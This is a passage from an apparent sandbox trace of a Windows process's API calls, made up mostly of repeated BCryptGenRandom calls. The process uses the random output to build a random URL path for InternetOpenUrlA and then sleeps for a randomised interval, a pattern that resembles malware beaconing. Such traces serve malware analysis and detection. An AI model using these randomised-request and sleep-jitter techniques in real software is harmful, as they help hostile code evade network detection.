hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.306] GetProcessHeap () returned 0x440000 [0178.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0178.306] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0178.306] lstrcatA (in: lpString1="\x04", lpString2="/dEnGpdWBJoxjkwxi/pe0iXskz8rq24nsqvlcweClu7ry4eav8li6d/" | out: lpString1="\x04/dEnGpdWBJoxjkwxi/pe0iXskz8rq24nsqvlcweClu7ry4eav8li6d/") returned="\x04/dEnGpdWBJoxjkwxi/pe0iXskz8rq24nsqvlcweClu7ry4eav8li6d/" [0178.306] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0178.307] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/dEnGpdWBJoxjkwxi/pe0iXskz8rq24nsqvlcweClu7ry4eav8li6d/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0178.307] GetProcessHeap () returned 0x440000 [0178.307] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0178.307] GetProcessHeap () returned 0x440000 [0178.307] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0178.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0178.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0178.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0178.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0178.308] Sleep (dwMilliseconds=0x17c47) [0178.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0178.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.454] GetProcessHeap () returned 0x440000 [0178.454] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5460 [0178.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5461, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x4d5461) returned 0x0 [0178.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5475, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d5475) returned 0x0 [0178.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d54a4, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x4d54a4) returned 0x0 [0178.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d54c6, cbBuffer=0x20, dwFlags=0x2 | 